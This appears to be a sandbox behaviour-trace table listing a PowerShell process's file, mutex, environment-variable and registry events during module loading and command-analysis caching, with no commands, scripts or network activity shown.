| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 11, size_out = 11 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 3483 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Security\Microsoft.PowerShell.Security.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f, size = 4096, size_out = 1815 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_41c67784-5a05-4d3a-a346-47e4d3e9d32f, size = 4096, size_out = 0 |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtils.psd1, type = file_attributes |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\Microsoft.PowerShell.ODataUtilsHelper.ps1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46610b03-43d8-466e-ac05-954274c00100, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_46610b03-43d8-466e-ac05-954274c00100, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\1.0.0.1.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 4096, size_out = 1528 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 520, size_out = 0 |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 4096, size_out = 0 |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.psm1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.cdxml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.xaml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\PackageManagement.dll, type = file_attributes |
|
1 | |
| File | Read | filename = C:\Program Files\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1, size = 4096, size_out = 737 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.ODataUtils\en-US\en-US.xaml, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetAdapter, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetAdapter\NetAdapter.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetConnection, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetConnection\NetConnection.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetEventPacketCapture\NetEventPacketCapture.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetLbfo, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetLbfo\NetLbfo.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetNat\NetNat.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetQos\NetQos.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSecurity\NetSecurity.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetSwitchTeam\NetSwitchTeam.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetTCPIP\NetTCPIP.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkConnectivityStatus\NetworkConnectivityStatus.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkSwitchManager\NetworkSwitchManager.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\NetworkTransition\NetworkTransition.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\PcsvDevice\PcsvDevice.psd1, type = file_attributes |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
2 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| Mutex | Release | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| Environment | Get Environment String | name = PSDisableModuleAutoLoadingMemoryCache |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 43, size_out = 43 |
|
1 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28, type = file_type |
|
2 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| Mutex | Create | mutex_name = Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000 |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex, size = 4096, size_out = 4096 |
|
1 | |
| File | Get Info | filename = c:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\, type = file_attributes |
|
1 | |
| File | Create | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28, desired_access = GENERIC_WRITE, GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28, type = file_type |
|
2 | |
| File | Read | filename = C:\Users\Nd9E1FYi\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_b546bd1f-3b03-41b0-bebc-d44f0a030d28, size = 4096, size_out = 4096 |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
2 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, type = file_type |
|
2 | |
| File | Read | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Management.psd1, size = 4096, size_out = 2389 |
|
1 | |
| System | Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\wldp.dll, type = file_attributes |
|
1 | |
| System | Get Info | type = Hardware Information |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment, value_name = __PSLockdownPolicy, type = REG_NONE |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en-US\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\en\Microsoft.PowerShell.Management.psd1, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\PSGetModuleInfo.xml, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\windows\system32\windowspowershell\v1.0\Modules\Microsoft.PowerShell.Management\Microsoft.PowerShell.Commands.Management.dll\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| Environment | Get Environment String | name = PSMODULEPATH, result_out = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules;C:\Program Files\WindowsPowerShell\Modules;C:\Windows\system32\WindowsPowerShell\v1.0\Modules |
|
1 | |
| File | Get Info | filename = C:\Users\Nd9E1FYi\Documents\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Program Files\WindowsPowerShell\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management, type = file_attributes |
|
1 | |
| File | Get Info | filename = C:\Windows\system32\WindowsPowerShell\v1.0\Modules\Microsoft.PowerShell.Commands.Management\Microsoft.PowerShell.Commands.Management.dll, type = file_attributes |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Registry | Read Value | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine, value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Registry | Open Key | reg_name = HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\3\PowerShellEngine |
|
